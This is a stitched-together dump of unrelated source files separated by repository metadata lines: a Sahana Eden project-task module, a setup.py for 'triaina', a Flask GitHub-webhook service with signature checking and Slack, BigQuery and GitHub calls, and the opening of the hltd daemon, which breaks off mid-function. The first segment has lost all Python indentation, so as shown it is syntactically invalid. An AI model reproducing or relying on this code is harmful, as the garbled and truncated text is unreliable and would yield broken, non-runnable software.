prow = row["project_project"]
row = row["gis_location"]
name = row.name
level = row.level
if level == "L0":
location = name
else:
locations = [name]
lappend = locations.append
matched = False
L5 = row.L5
if L5:
if L5 == name:
matched = True
else:
lappend(L5)
L4 = row.L4
if L4:
if L4 == name:
if matched:
lappend(L4)
matched = True
else:
lappend(L4)
L3 = row.L3
if L3:
if L3 == name:
if matched:
lappend(L3)
matched = True
else:
lappend(L3)
L2 = row.L2
if L2:
if L2 == name:
if matched:
lappend(L2)
matched = True
else:
lappend(L2)
L1 = row.L1
if L1:
if L1 == name:
if matched:
lappend(L1)
matched = True
else:
lappend(L1)
if self.multi_country:
L0 = row.L0
if L0:
if L0 == name:
if matched:
lappend(L0)
matched = True
else:
lappend(L0)
location = ", ".join(locations)
if community:
return s3_unicode(location)
else:
if self.use_codes and prow.code:
project = "%s: %s" % (prow.code, prow.name)
else:
project = prow.name
name = "%s (%s)" % (project, location)
return s3_unicode(name)
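# Rough example of the representation assembled above (all data invented):
# with use_codes enabled, a non-community deployment and a multi-country
# setup, a joined row for project code "WASH-01", name "Water Access" in
# village "Kandy" would come out approximately as
#
#   "WASH-01: Water Access (Kandy, Central, Sri Lanka)"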
# =============================================================================
def task_notify(form):
"""
If the task is assigned to someone then notify them
"""
vars = form.vars
pe_id = vars.pe_id
if not pe_id:
return
user = current.auth.user
if user and user.pe_id == pe_id:
# Don't notify the user when they assign themselves tasks
return
if int(vars.status) not in current.response.s3.project_task_active_statuses:
# No need to notify about closed tasks
return
if form.record is None or (int(pe_id) != form.record.pe_id):
# Assignee has changed
settings = current.deployment_settings
if settings.has_module("msg"):
# Notify assignee
subject = "%s: Task assigned to you" % settings.get_system_name_short()
url = "%s%s" % (settings.get_base_public_url(),
URL(c="project", f="task", args=vars.id))
priority = current.s3db.project_task.priority.represent(int(vars.priority))
message = "You have been assigned a Task:\n\n%s\n\n%s\n\n%s\n\n%s" % \
(url,
"%s priority" % priority,
vars.name,
vars.description or "")
current.msg.send_by_pe_id(pe_id, subject, message)
return
# =============================================================================
class S3ProjectThemeVirtualFields:
""" Virtual fields for the project table """
def themes(self):
"""
Themes associated with this Project
"""
try:
project_id = self.project_project.id
except AttributeError:
return ""
s3db = current.s3db
ptable = s3db.project_project
ttable = s3db.project_theme
ltable = s3db.project_theme_percentage
query = (ltable.deleted != True) & \
(ltable.project_id == project_id) & \
(ltable.theme_id == ttable.id)
themes = current.db(query).select(ttable.name,
ltable.percentage)
if not themes:
return current.messages["NONE"]
represent = ""
for theme in themes:
name = theme.project_theme.name
percentage = theme.project_theme_percentage.percentage
if represent:
represent = "%s, %s (%s%s)" % (represent,
name,
percentage,
"%")
else:
represent = "%s (%s%s)" % (name, percentage, "%")
return represent
# =============================================================================
# project_time virtual fields
#
def project_time_day(row):
"""
Virtual field for project_time - abbreviated string format for
date, allows grouping per day instead of the individual datetime,
used for project time report.
Requires "date" to be in the additional report_fields
@param row: the Row
"""
try:
thisdate = row["project_time.date"]
except AttributeError:
return current.messages["NONE"]
if not thisdate:
return current.messages["NONE"]
now = current.request.utcnow
week = datetime.timedelta(days=7)
#if thisdate < (now - week):
# Ignore data older than the last week
# - should already be filtered in controller anyway
# return default
return thisdate.date().strftime("%d %B %y")
# =============================================================================
def project_time_week(row):
"""
Virtual field for project_time - returns the date of the Monday
(=first day of the week) of this entry, used for project time report.
Requires "date" to be in the additional report_fields
@param row: the Row
"""
try:
thisdate = row["project_time.date"]
except AttributeError:
return current.messages["NONE"]
if not thisdate:
return current.messages["NONE"]
day = thisdate.date()
monday = day - datetime.timedelta(days=day.weekday())
return monday
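# Quick sanity check of the Monday arithmetic above (dates invented for
# illustration): date.weekday() is 0 for Monday, so subtracting the weekday
# always lands on the Monday of the same week:
#
#   day = datetime.date(2013, 7, 18)              # a Thursday, weekday()==3
#   day - datetime.timedelta(days=day.weekday())  # -> datetime.date(2013, 7, 15)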
# =============================================================================
def project_ckeditor():
""" Load the Project Comments JS """
s3 = current.response.s3
ckeditor = URL(c="static", f="ckeditor", args="ckeditor.js")
s3.scripts.append(ckeditor)
adapter = URL(c="static", f="ckeditor", args=["adapters", "jquery.js"])
s3.scripts.append(adapter)
# Toolbar options: http://docs.cksource.com/CKEditor_3.x/Developers_Guide/Toolbar
# @ToDo: Move to Static
js = "".join((
'''i18n.reply="''', str(current.T("Reply")), '''"
var img_path=S3.Ap.concat('/static/img/jCollapsible/')
var ck_config={toolbar:[['Bold','Italic','-','NumberedList','BulletedList','-','Link','Unlink','-','Smiley','-','Source','Maximize']],toolbarCanCollapse:false,removePlugins:'elementspath'}
function comment_reply(id){
$('#project_comment_task_id__row').hide()
$('#project_comment_task_id__row1').hide()
$('#comment-title').html(i18n.reply)
$('#project_comment_body').ckeditorGet().destroy()
$('#project_comment_body').ckeditor(ck_config)
$('#comment-form').insertAfter($('#comment-'+id))
$('#project_comment_parent').val(id)
var task_id = $('#comment-'+id).attr('task_id')
$('#project_comment_task_id').val(task_id)
}'''))
s3.js_global.append(js)
# =============================================================================
def project_rheader(r):
""" Project Resource Headers - used in Project & Budget modules """
if r.representation != "html":
# RHeaders only used in interactive views
return None
# Need to use this as otherwise demographic_data?viewing=project_location.x
# doesn't have an rheader
tablename, record = s3_rheader_resource(r)
if not record:
return None
s3db = current.s3db
table = s3db.table(tablename)
resourcename = r.name
T = current.T
auth = current.auth
settings = current.deployment_settings
attachments_label = settings.get_ui_label_attachments()
if resourcename == "project":
mode_3w = settings.get_project_mode_3w()
mode_task = settings.get_project_mode_task()
# Tabs
ADMIN = current.session.s3.system_roles.ADMIN
admin = auth.s3_has_role(ADMIN)
#staff = auth.s3_has_role("STAFF")
staff = True
tabs = [(T("Basic Details"), None)]
append = tabs.append
if settings.get_project_multiple_organisations():
append((T("Organizations"), "organisation"))
if settings.get_project_theme_percentages():
append((T("Themes"), "theme"))
if mode_3w:
if settings.get_project_community():
append((T("Communities"), "location"))
else:
append((T("Locations"), "location"))
append((T("Beneficiaries"), "beneficiary"))
if settings.get_project_milestones():
append((T("Milestones"), "milestone"))
if settings.get_project_activities():
append((T("Activities"), "activity"))
if mode_task:
append((T("Tasks"), "task"))
if record.calendar:
append((T("Calendar"), "timeline"))
if settings.get_project_multiple_budgets():
append((T("Annual Budgets"), "annual_budget"))
if mode_3w:
append((T("Documents"), "document"))
else:
append((attachments_label, "document"))
if settings.get_hrm_show_staff():
append((T("Staff"), "human_resource", dict(group="staff")))
if settings.has_module("vol"):
append((T("Volunteers"), "human_resource", dict(group="volunteer")))
rheader_fields = [["code", "name"],
["organisation_id"],
["start_date", "end_date"]
]
rheader = S3ResourceHeader(rheader_fields, tabs)(r)
elif resourcename in ["location", "demographic_data"]:
tabs = [(T("Details"), None),
(T("Beneficiaries"), "beneficiary"),
(T("Demographics"), "demographic_data/"),
(T("Contact People"), "contact"),
]
rheader_fields = []
if record.project_id is not None:
rheader_fields.append(["project_id"])
rheader_fields.append(["location_id"])
rheader = S3ResourceHeader(rheader_fields, tabs)(r,
record = record,
table = table)
elif resourcename == "framework":
tabs = [(T("Details"), None),
(T("Organizations"), "organisation"),
(T("Documents"), "document")]
rheader_fields = [["name"]]
rheader = S3ResourceHeader(rheader_fields, tabs)(r)
elif resourcename == "activity":
tabs = [(T("Details"), None),
(T("Contact People"), "contact")]
if settings.get_project_mode_task():
tabs.append((T("Tasks"), "task"))
tabs.append((attachments_label, "document"))
else:
tabs.append((T("Documents"), "document"))
rheader_fields = []
if record.project_id is not None:
rheader_fields.append(["project_id"])
rheader_fields.append(["name"])
rheader_fields.append(["location_id"])
rheader = S3ResourceHeader(rheader_fields, tabs)(r)
elif resourcename == "task":
# Tabs
tabs = [(T("Details"), None)]
append = tabs.append
append((attachments_label, "document"))
if settings.has_module("msg"):
append((T("Notify"), "dispatch"))
#(T("Roles"), "job_title"),
#(T("Assignments"), "human_resource"),
#(T("Requests"), "req")
rheader_tabs = s3_rheader_tabs(r, tabs)
# RHeader
db = current.db
ltable = s3db.project_task_project
ptable = db.project_project
query = (ltable.deleted == False) & \
(ltable.task_id == r.id) & \
(ltable.project_id == ptable.id)
row = db(query).select(ptable.id,
ptable.code,
ptable.name,
limitby=(0, 1)).first()
if row:
project = s3db.project_project_represent(None, row)
project = TR(TH("%s: " % T("Project")),
project,
)
else:
project = ""
atable = s3db.project_activity
ltable = s3db.project_task_activity
query = (ltable.deleted == False) & \
(ltable.task_id == r.id) & \
(ltable.activity_id == atable.id)
activity = db(query).select(atable.name,
limitby=(0, 1)).first()
if activity:
activity = TR(TH("%s: " % T("Activity")),
activity.name
)
else:
activity = ""
if record.description:
description = TR(TH("%s: " % table.description.label),
record.description
)
else:
description = ""
if record.site_id:
facility = TR(TH("%s: " % table.site_id.label),
table.site_id.represent(record.site_id),
)
else:
facility = ""
if record.location_id:
location = TR(TH("%s: " % table.location_id.label),
table.location_id.represent(record.location_id),
)
else:
location = ""
if record.created_by:
creator = TR(TH("%s: " % T("Created By")),
s3_auth_user_represent(record.created_by),
)
else:
creator = ""
if record.time_estimated:
time_estimated = TR(TH("%s: " % table.time_estimated.label),
record.time_estimated
)
else:
time_estimated = ""
if record.time_actual:
time_actual = TR(TH("%s: " % table.time_actual.label),
record.time_actual
)
else:
time_actual = ""
rheader = DIV(TABLE(project,
activity,
TR(TH("%s: " % table.name.label),
record.name,
),
description,
facility,
location,
creator,
time_estimated,
time_actual,
#comments,
), rheader_tabs)
return rheader
# =============================================================================
def project_task_form_inject(r, output, project=True):
"""
Inject Project, Activity & Milestone fields into a Task form
@ToDo: Re-implement using http://eden.sahanafoundation.org/wiki/S3SQLForm
"""
T = current.T
db = current.db
s3db = current.s3db
auth = current.auth
s3 = current.response.s3
settings = current.deployment_settings
sep = ": "
s3_formstyle = settings.get_ui_formstyle()
table = s3db.project_task_activity
field = table.activity_id
default = None
if r.component_id:
query = (table.task_id == r.component_id)
default = db(query).select(field,
limitby=(0, 1)).first()
if default:
default = default.activity_id
elif r.id:
query = (table.task_id == r.id)
default = db(query).select(field,
limitby=(0, 1)).first()
if default:
default = default.activity_id
if not default:
default = field.default
field_id = "%s_%s" % (table._tablename, field.name)
if r.component:
requires = {}
table = db.project_activity
query = (table.project_id == r.id)
rows = db(query).select(table.id, table.name)
for row in rows:
requires[row.id] = row.name
field.requires = IS_IN_SET(requires)
else:
if default:
field.requires = IS_IN_SET([default])
else:
field.requires = IS_IN_SET([])
widget = SQLFORM.widgets.options.widget(field, default)
label = field.label
label = LABEL(label, label and sep, _for=field_id,
_id=field_id + SQLFORM.ID_LABEL_SUFFIX)
comment = S3AddResourceLink(T("Add Activity"),
c="project",
f="activity",
tooltip=T("If you don't see the activity in the list, you can add a new one by clicking link 'Add Activity'."))
if project:
options = {"triggerName": "project_id",
"targetName": "activity_id",
"lookupPrefix": "project",
"lookupResource": "activity",
"optional": True,
}
s3.jquery_ready.append('''S3OptionsFilter(%s)''' % json.dumps(options))
row_id = field_id + SQLFORM.ID_ROW_SUFFIX
row = s3_formstyle(row_id, label, widget, comment)
try:
output["form"][0].insert(0, row[1])
except:
# A non-standard formstyle with just a single row
pass
try:
output["form"][0].insert(0, row[0])
except:
pass
# Milestones
if settings.get_project_milestones():
table = s3db.project_task_milestone
field = table.milestone_id
if project and r.id:
query = (table.task_id == r.id)
default = db(query).select(field,
limitby=(0, 1)).first()
if default:
default = default.milestone_id
else:
default = field.default
field_id = "%s_%s" % (table._tablename, field.name)
# Options will be added later based on the Project
if default:
field.requires = IS_IN_SET({default:field.represent(default)})
else:
field.requires = IS_IN_SET([])
#widget = SELECT(_id=field_id, _name=field.name)
widget = SQLFORM.widgets.options.widget(field, default)
label = field.label
label = LABEL(label, label and sep, _for=field_id,
_id=field_id + SQLFORM.ID_LABEL_SUFFIX)
comment = S3AddResourceLink(T("Add Milestone"),
c="project",
f="milestone",
tooltip=T("If you don't see the milestone in the list, you can add a new one by clicking link 'Add Milestone'."))
options = {"triggerName": "project_id",
"targetName": "milestone_id",
"lookupPrefix": "project",
"lookupResource": "milestone",
"optional": True,
}
s3.jquery_ready.append('''S3OptionsFilter(%s)''' % json.dumps(options))
row_id = field_id + SQLFORM.ID_ROW_SUFFIX
row = s3_formstyle(row_id, label, widget, comment)
try:
output["form"][0].insert(14, row[1])
output["form"][0].insert(14, row[0])
except:
# A non-standard formstyle with just a single row
pass
try:
output["form"][0].insert(7, row[0])
except:
pass
if project:
vars = current.request.get_vars
if "project" in vars:
widget = INPUT(value=vars.project, _name="project_id")
row = s3_formstyle("project_task_project__row", "",
widget, "", hidden=True)
else:
table = s3db.project_task_project
field = table.project_id
if r.id:
query = (table.task_id == r.id)
default = db(query).select(table.project_id,
limitby=(0, 1)).first()
if default:
default = default.project_id
else:
default = field.default
widget = field.widget or SQLFORM.widgets.options.widget(field, default)
field_id = "%s_%s" % (table._tablename, field.name)
label = field.label
label = LABEL(label, label and sep, _for=field_id,
_id=field_id + SQLFORM.ID_LABEL_SUFFIX)
comment = field.comment if auth.s3_has_role("STAFF") else ""
row_id = field_id + SQLFORM.ID_ROW_SUFFIX
row = s3_formstyle(row_id, label, widget, comment)
try:
output["form"][0].insert(0, row[1])
except:
# A non-standard formstyle with just a single row
pass
try:
output["form"][0].insert(0, row[0])
except:
pass
return output
# =============================================================================
def project_task_controller():
"""
Tasks Controller, defined in the model for use from
multiple controllers for unified menus
"""
T = current.T
s3db = current.s3db
auth = current.auth
s3 = current.response.s3
vars = current.request.get_vars
# Pre-process
def prep(r):
tablename = "project_task"
table = s3db.project_task
statuses = s3.project_task_active_statuses
crud_strings = s3.crud_strings[tablename]
if r.record:
if r.interactive:
# Put the Comments in the RFooter
project_ckeditor()
s3.rfooter = LOAD("project", "comments.load",
args=[r.id],
ajax=True)
elif "mine" in vars:
# Show the Open Tasks for this User
if auth.user:
pe_id = auth.user.pe_id
s3.filter = (table.pe_id == pe_id) & \
(table.status.belongs(statuses))
crud_strings.title_list = T("My Open Tasks")
crud_strings.msg_list_empty = T("No Tasks Assigned")
s3db.configure(tablename,
copyable=False,
listadd=False)
try:
# Add Project
list_fields = s3db.get_config(tablename,
"list_fields")
list_fields.insert(4, (T("Project"), "task_project.project_id"))
# Hide the Assignee column (always us)
list_fields.remove("pe_id")
# Hide the Status column (always 'assigned' or 'reopened')
list_fields.remove("status")
s3db.configure(tablename,
list_fields=list_fields)
except:
pass
elif "project" in vars:
# Show Open Tasks for this Project
project = vars.project
ptable = s3db.project_project
try:
name = current.db(ptable.id == project).select(ptable.name,
limitby=(0, 1)).first().name
except:
current.session.error = T("Project not Found")
redirect(URL(args=None, vars=None))
if r.method == "search":
# @ToDo: get working
r.get_vars = {"task_search_project": name,
"task_search_status": ",".join([str(status) for status in statuses])
}
else:
ltable = s3db.project_task_project
s3.filter = (ltable.project_id == project) & \
(ltable.task_id == table.id) & \
(table.status.belongs(statuses))
crud_strings.title_list = T("Open Tasks for %(project)s") % dict(project=name)
crud_strings.title_search = T("Search Open Tasks for %(project)s") % dict(project=name)
crud_strings.msg_list_empty = T("No Open Tasks for %(project)s") % dict(project=name)
# Add Activity
list_fields = s3db.get_config(tablename,
"list_fields")
list_fields.insert(2, (T("Activity"), "task_activity.activity_id"))
s3db.configure(tablename,
# Block Add until we get the injectable component lookups
insertable=False,
deletable=False,
copyable=False,
list_fields=list_fields)
elif "open" in vars:
# Show Only Open Tasks
crud_strings.title_list = T("All Open Tasks")
s3.filter = (table.status.belongs(statuses))
else:
crud_strings.title_list = T("All Tasks")
crud_strings.title_search = T("All Tasks")
list_fields = s3db.get_config(tablename,
"list_fields")
list_fields.insert(3, (T("Project"), "task_project.project_id"))
list_fields.insert(4, (T("Activity"), "task_activity.activity_id"))
if r.component:
if r.component_name == "req":
if current.deployment_settings.has_module("hrm"):
r.component.table.type.default = 3
if r.method != "update" and r.method != "read":
# Hide fields which don't make sense in a Create form
s3db.req_create_form_mods()
elif r.component_name == "human_resource":
r.component.table.type.default = 2
else:
if not auth.s3_has_role("STAFF"):
                # Hide fields to avoid confusing both inputters & recipients
table = r.table
field = table.time_actual
field.readable = field.writable = False
return True
s3.prep = prep
# Post-process
def postp(r, output):
if r.interactive:
if not r.component and \
r.method != "import":
update_url = URL(args=["[id]"], vars=vars)
current.manager.crud.action_buttons(r,
update_url=update_url)
if not r.method in ("search", "report") and \
"form" in output:
# Insert fields to control the Project, Activity & Milestone
output = project_task_form_inject(r, output)
return output
s3.postp = postp
if "mine" in vars or \
"project" in vars:
hide_filter = True
else:
hide_filter = False
return current.rest_controller("project", "task",
rheader=s3db.project_rheader,
hide_filter=hide_filter,
)
# END =========================================================================
| mit | -3,539,949,038,401,025,500 | 40.930473 | 219 | 0.426801 | false | 5.143912 | false | false | false |
saxtouri/triaina | setup.py | 1 | 2483 | # Copyright (c) 2014, Stavros Sachtouris
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from setuptools import setup
import triaina
setup(
name='triaina',
version=triaina.__version__,
description=('A kamaki clone done differently'),
long_description=open('README.md').read(),
url='http://github.com/saxtouri/triaina',
download_url='https://github.com/saxtouri/triaina/archive/master.zip',
license='BSD',
author='Stavros Sachtouris',
author_email='[email protected]',
maintainer='Stavros Sachtouris',
maintainer_email='[email protected]',
packages=['triaina', ],
classifiers=[
'Operating System :: OS Independent',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'Environment :: Console',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
'Topic :: System :: Shells',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Utilities'
],
include_package_data=True,
entry_points={
},
install_requires=[]
)
| bsd-2-clause | 5,163,811,194,186,354,000 | 41.810345 | 80 | 0.712847 | false | 4.295848 | false | false | false |
GoogleCloudPlatform/serverless-expeditions | webhooks-with-cloud-run/Monolith/main.py | 1 | 5580 | # Copyright 2019 Google, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import hmac
import json
import os
import sys
import time
import urllib
from flask import Flask, request
from google.cloud import secretmanager_v1beta1
from hashlib import sha1
app = Flask(__name__)
@app.route("/", methods=["POST"])
def index():
signature = request.headers.get("X-Hub-Signature", None)
body = request.data
# Only process data with a valid signature
assert verify_signature(signature, body), "Unverified Signature"
# Load the event as JSON for easier handling
event = request.get_json(force=True)
# Insert row into bigquery
insert_row_into_bigquery(event)
# Post new issues to Slack
if event["action"] == "opened":
issue_title = event["issue"]["title"]
issue_url = event["issue"]["html_url"]
send_issue_notification_to_slack(issue_title, issue_url)
# Post response to Github
create_issue_comment(event["issue"]["url"])
print("Yay")
sys.stdout.flush()
return ("", 204)
def verify_signature(signature, body):
expected_signature = "sha1="
try:
# Get secret from Cloud Secret Manager
secret = get_secret(
os.environ.get("PROJECT_NAME"), os.environ.get("SECRET_NAME"), "1"
)
# Compute the hashed signature
hashed = hmac.new(secret, body, sha1)
expected_signature += hashed.hexdigest()
except Exception as e:
print(e)
return hmac.compare_digest(signature, expected_signature)
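# Minimal sketch of how the X-Hub-Signature value checked above can be
# reproduced for a local test (the secret and body below are made-up test
# values, not the real webhook secret):
#
#   test_secret = b"my-webhook-secret"
#   test_body = b'{"action": "opened"}'
#   test_sig = "sha1=" + hmac.new(test_secret, test_body, sha1).hexdigest()
#   # verify_signature(test_sig, test_body) then passes only if Secret
#   # Manager returns exactly test_secret for the configured secret name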
def send_issue_notification_to_slack(issue_title, issue_url):
# Sends a message to Slack Channel
msg = {
"blocks": [
{
"type": "section",
"text": {
"type": "mrkdwn",
"text": f"New issue created: <{issue_url}|{issue_title}>",
},
}
]
}
req = urllib.request.Request(
os.environ.get("SLACK_URL"),
data=json.dumps(msg).encode("utf8"),
headers={"Content-Type": "application/json"},
)
response = urllib.request.urlopen(req)
def insert_row_into_bigquery(event):
from google.cloud import bigquery
# Set up bigquery instance
client = bigquery.Client()
dataset_id = os.environ.get("DATASET")
table_id = os.environ.get("TABLE")
table_ref = client.dataset(dataset_id).table(table_id)
table = client.get_table(table_ref)
# Insert row
row_to_insert = [
(
event["issue"]["title"],
event["action"],
event["issue"]["html_url"],
time.time(),
)
]
bq_errors = client.insert_rows(table, row_to_insert)
# If errors, log to Stackdriver
if bq_errors:
entry = {
"severity": "WARNING",
"msg": "Row not inserted.",
"errors": bq_errors,
"row": row_to_insert,
}
print(json.dumps(entry))
def create_issue_comment(api_url):
# Posts an auto response to Github Issue
# Get tokens
pem = get_secret(os.environ.get("PROJECT_NAME"), os.environ.get("PEM"), "1")
app_token = get_jwt(pem)
installation_token = get_installation_token(app_token)
# Create Github issue comment via HTTP POST
try:
msg = {
"body": "Thank you for filing an issue. \
Someone will respond within 24 hours."
}
req = urllib.request.Request(
api_url + "/comments", data=json.dumps(msg).encode("utf8")
)
req.add_header("Authorization", f"Bearer {installation_token}")
response = urllib.request.urlopen(req)
except Exception as e:
print(e)
def get_jwt(pem):
# Encodes and returns JWT
from jwt import JWT, jwk_from_pem
payload = {
"iat": int(time.time()),
"exp": int(time.time()) + (10 * 60),
"iss": os.environ.get("APP_ID"),
}
jwt = JWT()
return jwt.encode(payload, jwk_from_pem(pem), "RS256")
def get_installation_token(jwt):
# Get App installation token to use Github API
req = urllib.request.Request(os.environ.get("INSTALLATION"), method="POST")
req.add_header("Authorization", f"Bearer {jwt}")
req.add_header("Accept", "application/vnd.github.machine-man-preview+json")
response = urllib.request.urlopen(req)
token_json = json.loads(response.read())
return token_json["token"]
def get_secret(project_name, secret_name, version_num):
# Returns secret payload from Cloud Secret Manager
client = secretmanager_v1beta1.SecretManagerServiceClient()
name = client.secret_version_path(project_name, secret_name, version_num)
secret = client.access_secret_version(name)
return secret.payload.data
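# For reference, secret_version_path() used above builds the canonical
# Secret Manager resource name, roughly
#
#   "projects/{project_name}/secrets/{secret_name}/versions/{version_num}"
#
# so get_secret("my-project", "github-secret", "1") (hypothetical names)
# accesses projects/my-project/secrets/github-secret/versions/1.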
if __name__ == "__main__":
PORT = int(os.getenv("PORT")) if os.getenv("PORT") else 8080
# This is used when running locally. Gunicorn is used to run the
# application on Cloud Run. See entrypoint in Dockerfile.
app.run(host="127.0.0.1", port=PORT, debug=True)
| apache-2.0 | -7,725,025,906,462,267,000 | 27.911917 | 80 | 0.624014 | false | 3.755047 | false | false | false |
dmitrijus/hltd | python/hltd.py | 1 | 148906 | #!/bin/env python
import os,sys
sys.path.append('/opt/hltd/python')
sys.path.append('/opt/hltd/lib')
import time
import datetime
import dateutil.parser
import logging
import subprocess
from signal import SIGKILL
from signal import SIGINT
import simplejson as json
#import SOAPpy
import threading
import CGIHTTPServer
import BaseHTTPServer
import cgitb
import httplib
import demote
import re
import shutil
import socket
#import fcntl
#import random
#modules distributed with hltd
import prctl
#modules which are part of hltd
from daemon2 import Daemon2
from hltdconf import *
from inotifywrapper import InotifyWrapper
import _inotify as inotify
from elasticbu import BoxInfoUpdater
from aUtils import fileHandler,ES_DIR_NAME
from setupES import setupES
thishost = os.uname()[1]
nthreads = None
nstreams = None
expected_processes = None
runList = None
bu_disk_list_ramdisk=[]
bu_disk_list_output=[]
bu_disk_list_ramdisk_instance=[]
bu_disk_list_output_instance=[]
bu_disk_ramdisk_CI = None
bu_disk_ramdisk_CI_instance = None
resource_lock = threading.Lock()
nsslock = threading.Lock()
suspended=False
entering_cloud_mode=False
exiting_cloud_mode=False
cloud_mode=False
abort_cloud_mode=False
cached_pending_run = None
resources_blocked_flag=False
disabled_resource_allocation=False
masked_resources=False
fu_watchdir_is_mountpoint=False
ramdisk_submount_size=0
machine_blacklist=[]
boxinfoFUMap = {}
boxdoc_version = 1
logCollector = None
q_list = []
num_excluded=0
dqm_globalrun_filepattern = '.run{0}.global'
def setFromConf(myinstance):
global conf
global logger
global idles
global used
global broken
global quarantined
global cloud
conf=initConf(myinstance)
idles = conf.resource_base+'/idle/'
used = conf.resource_base+'/online/'
broken = conf.resource_base+'/except/'
quarantined = conf.resource_base+'/quarantined/'
cloud = conf.resource_base+'/cloud/'
#prepare log directory
if myinstance!='main':
if not os.path.exists(conf.log_dir): os.makedirs(conf.log_dir)
if not os.path.exists(os.path.join(conf.log_dir,'pid')): os.makedirs(os.path.join(conf.log_dir,'pid'))
os.chmod(conf.log_dir,0777)
os.chmod(os.path.join(conf.log_dir,'pid'),0777)
logging.basicConfig(filename=os.path.join(conf.log_dir,"hltd.log"),
level=conf.service_log_level,
format='%(levelname)s:%(asctime)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
logger = logging.getLogger(os.path.basename(__file__))
conf.dump()
def preexec_function():
dem = demote.demote(conf.user)
dem()
prctl.set_pdeathsig(SIGKILL)
# os.setpgrp()
def cleanup_resources():
try:
dirlist = os.listdir(cloud)
for cpu in dirlist:
os.rename(cloud+cpu,idles+cpu)
dirlist = os.listdir(broken)
for cpu in dirlist:
os.rename(broken+cpu,idles+cpu)
dirlist = os.listdir(used)
for cpu in dirlist:
os.rename(used+cpu,idles+cpu)
dirlist = os.listdir(quarantined)
for cpu in dirlist:
os.rename(quarantined+cpu,idles+cpu)
dirlist = os.listdir(idles)
        #quarantine resources beyond the use fraction limit (rounded to the closest integer)
global num_excluded
num_excluded = int(round(len(dirlist)*(1.-conf.resource_use_fraction)))
for i in range(0,int(num_excluded)):
os.rename(idles+dirlist[i],quarantined+dirlist[i])
return True
except Exception as ex:
logger.warning(str(ex))
return False
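# Sketch of the resource bookkeeping handled above (layout inferred from this
# file; <resource_base> stands for whatever conf.resource_base points to):
# each CPU core is a file named after the core, and hltd moves it between
# state directories, e.g.
#
#   <resource_base>/idle/core5         -> core is free
#   <resource_base>/online/core5       -> core is running a CMSSW process
#   <resource_base>/except/core5       -> core is broken
#   <resource_base>/quarantined/core5  -> core is excluded from allocation
#   <resource_base>/cloud/core5        -> core is handed over to cloud use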
def move_resources_to_cloud():
global q_list
dirlist = os.listdir(broken)
for cpu in dirlist:
os.rename(broken+cpu,cloud+cpu)
dirlist = os.listdir(used)
for cpu in dirlist:
os.rename(used+cpu,cloud+cpu)
dirlist = os.listdir(quarantined)
for cpu in dirlist:
os.rename(quarantined+cpu,cloud+cpu)
q_list=[]
dirlist = os.listdir(idles)
for cpu in dirlist:
os.rename(idles+cpu,cloud+cpu)
dirlist = os.listdir(idles)
for cpu in dirlist:
os.rename(idles+cpu,cloud+cpu)
def has_active_resources():
return len(os.listdir(broken))+len(os.listdir(used))+len(os.listdir(idles)) > 0
#interfaces to the cloud igniter script
def ignite_cloud():
try:
proc = subprocess.Popen([conf.cloud_igniter_path,'start'],stdout=subprocess.PIPE,stderr=subprocess.PIPE)
out = proc.communicate()[0]
if proc.returncode==0:
return True
else:
logger.error("cloud igniter start returned code "+str(proc.returncode))
if proc.returncode>1:
logger.error(out)
except OSError as ex:
if ex.errno==2:
logger.warning(conf.cloud_igniter_path + ' is missing')
else:
logger.error("Failed to run cloud igniter start")
logger.exception(ex)
return False
def extinguish_cloud():
try:
proc = subprocess.Popen([conf.cloud_igniter_path,'stop'],stdout=subprocess.PIPE,stderr=subprocess.PIPE)
out = proc.communicate()[0]
if proc.returncode in [0,1]:
return True
else:
logger.error("cloud igniter stop returned "+str(proc.returncode))
if len(out):logger.error(out)
except OSError as ex:
if ex.errno==2:
logger.warning(conf.cloud_igniter_path + ' is missing')
else:
logger.error("Failed to run cloud igniter start")
logger.exception(ex)
return False
def is_cloud_inactive():
try:
proc = subprocess.Popen([conf.cloud_igniter_path,'status'],stdout=subprocess.PIPE,stderr=subprocess.PIPE)
out = proc.communicate()[0]
if proc.returncode >1:
logger.error("cloud igniter status returned error code "+str(proc.returncode))
logger.error(out)
except OSError as ex:
if ex.errno==2:
logger.warning(conf.cloud_igniter_path + ' is missing')
else:
logger.error("Failed to run cloud igniter start")
logger.exception(ex)
return 100
return proc.returncode
def umount_helper(point,attemptsLeft=3,initial=True):
if initial:
try:
logger.info('calling umount of '+point)
subprocess.check_call(['umount',point])
except subprocess.CalledProcessError, err1:
if err1.returncode<2:return True
if attemptsLeft<=0:
logger.error('Failed to perform umount of '+point+'. returncode:'+str(err1.returncode))
return False
